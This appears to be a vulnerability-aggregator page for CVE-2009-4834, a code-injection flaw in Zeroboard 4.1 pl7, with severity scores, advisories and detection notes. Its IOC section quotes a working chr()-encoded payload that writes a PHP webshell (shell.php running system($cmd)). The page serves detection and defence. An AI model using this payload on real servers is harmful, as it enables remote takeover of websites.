CVE-2009-4834
published 2010-05-04CVE-2009-4834: lib.php in Zeroboard 4.1 pl7 allows remote attackers to execute arbitrary PHP code via a crafted parameter name, possibly related to now_connect.php.
PriorityP269medium6.8CVSS 2.0
AVNACMAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
4.02%
89.3th percentile
lib.php in Zeroboard 4.1 pl7 allows remote attackers to execute arbitrary PHP code via a crafted parameter name, possibly related to now_connect.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xpressengine | zeroboard | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1↗
- →Exploit targets the `preg_replace()` function in lib.php via a crafted parameter name injected through now_connect.php; look for HTTP requests to zboard.php or now_connect.php containing PHP code fragments or chr()-encoded payloads in parameter names or values. ↗
- →Exploit payload uses HTTP_SESSION_VARS, HTTP_SERVER_VARS, and HTTP_ENV_VARS as superglobal injection vectors; detect HTTP requests to zboard.php containing these parameter names alongside PHP code. ↗
- →Post-exploitation webshell is written to the /bbs/data/ directory as shell.php and accessed with a ?cmd= query parameter; monitor for creation of or requests to shell.php under the Zeroboard bbs/data path. ↗
- →The exploit payload is delivered as a crafted parameter name containing a preg_replace /e modifier injection wrapped in comment delimiters (*/.../*); detect URL-encoded or raw occurrences of this pattern in HTTP request parameter names targeting zboard.php. ↗
- ·The exploit targets Zeroboard version 4.1 pl7 specifically; other versions are not confirmed vulnerable by this PoC. ↗
- ·The PoC exploit code references a hardcoded test target path (zboard.php?id=test); real-world exploitation requires a valid board ID parameter, so detections should not be limited to id=test. ↗
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2qjg-hjm9-x7mg: lib
ghsa_unreviewed·2022-05-02
CVE-2009-4834 [MEDIUM] CWE-94 GHSA-2qjg-hjm9-x7mg: lib
lib.php in Zeroboard 4.1 pl7 allows remote attackers to execute arbitrary PHP code via a crafted parameter name, possibly related to now_connect.php.
Kernel
namei: allow restricted O_CREAT of FIFOs and regular files
kernel_security·2018-08-23·CVSS 7.2
CVE-2000-1134 [HIGH] namei: allow restricted O_CREAT of FIFOs and regular files
namei: allow restricted O_CREAT of FIFOs and regular files
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
VulnCheck
xpressengine zeroboard Improper Control of Generation of Code ('Code Injection')
vulncheck·2009·CVSS 6.8
CVE-2009-4834 [MEDIUM] xpressengine zeroboard Improper Control of Generation of Code ('Code Injection')
xpressengine zeroboard Improper Control of Generation of Code ('Code Injection')
lib.php in Zeroboard 4.1 pl7 allows remote attackers to execute arbitrary PHP code via a crafted parameter name, possibly related to now_connect.php.
Affected: xpressengine zeroboard
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-alert-zeroboard-now_connect-remote-code-execution-attacks/
No detection rules found.
No writeups or analysis indexed.
2010-05-04
Published
Exploited in the wild